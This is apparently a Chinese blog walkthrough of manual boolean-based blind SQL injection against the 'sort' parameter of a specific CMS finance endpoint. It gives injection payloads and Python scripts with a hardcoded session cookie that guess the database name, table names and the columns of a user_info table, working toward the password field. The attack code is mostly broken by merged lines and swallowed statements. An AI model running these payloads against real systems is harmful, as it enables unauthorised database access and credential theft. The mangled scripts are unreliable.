发现存在sql注入漏洞

简单一点可以直接用sqlmap工具暴库

但是如果想深入理解sql注入的原理，可以尝试手工注入，配合python脚本实现手工猜解数据库

首先hachbar开启

获取cms登录后的sessionid值

开始构造sql payload

获取数据库名的长度：

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

手工猜解需要从1往后遍历，当为8时，猜解成功

做sql手工注入的，主要是这个猜解的过程比较麻烦，大量的重复工作，所以需要做成python自动化

实现脚本如下：

# -*- encoding:utf-8 -*-#user()

#database()

import requests

cookies={'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'}string = ''

for i in range(1,300):

url='http://yucms.hhlyty.cn/finance/account/accountList'body= {'page': '1','rows': '15','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库名长度

#body= {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库中表的个数

#body= {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数

rs= requests.request("POST", url, cookies=cookies, params=body)

content=rs.content

length=len(content)

#print lengthif length == 9459:

print ("数据库长度为：%d" %i)

print(rs.text)

#string +=j

#break# printstring#print(rs.text)

猜解数据库完整的名字

payload

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),1,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

substr(database(),1,1 ,第一个1，表示字符串的第几位，第二个1,表示截取一位，这样，就可以逐字符猜解

# -*- encoding:utf-8 -*-import requests

cookies={'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'}

#dic1='3_abcdefghijklmnopqrstuvwxyz'dic="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}\|[{?>=

for i in range(1,92):

# leng= len(string)

#if leng == 8:for j indic:

#leng= len(string)#if leng == 8:#m=str(ord(j))

#print (m)

m=j

url='http://yucms.hhlyty.cn/finance/account/accountList'body= {'page': '1','rows': '15','order': 'desc','sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format((i),ord(m))}

rs= requests.request("POST", url, cookies=cookies, params=body)

content=rs.content

length=len(content)

#print (j)

print (body)

#print lengthif length == 9459:

print ("数据库第%d个字符是：%s:" %(i, j))

m=str(ord(j))string +=j

i=i+1print (m)

print (i)

# n=','# m+=n

# print (m)breakprint ("数据库是：%s" % string)

#breakprint (i)

# print ("数据库第%d个字符是：%s:" %(i,j))

# print ("数据库是：%s" % string)

#if length == 9459:

# print ("数据库长度为：%d" %i)

# print(rs.text)

#string +=j

#break# printstring#print(rs.text)

猜解表名：

1.猜解第204张表名的长度：

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)

)&order=desc

# -*- encoding:utf-8 -*-#user()

#database()

import requests

cookies={'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'}string = ''

for i in range(1,300):

url='http://yucms.hhlyty.cn/finance/account/accountList'#body= {'page': '1','rows': '15','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库名长度

#body= {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库中表的个数

#body= {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数

# body= {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数

body= {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中第204张表名的长度

rs= requests.request("POST", url, cookies=cookies, params=body)

content=rs.content

length=len(content)

#print lengthif length == 9459:

print ("数据库长度为：%d" %i)

print(rs.text)

#string +=j

#break# printstring#print(rs.text)

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 204,1)))=117) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

1表示表名的第一个字符

204表示数据库中的第204张表

117表示第一个字符的ascii编码

猜解列名：

1.首先猜测表中字段的个数

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=36) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

2.逐个字段猜解：

猜解密码字段：

猜解第204张表user_info表第一个字段的长度：

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=7) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

猜解第一个列名的长度：

猜解字段名字：

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,1,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=85) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

猜解字段名的第一个字符为85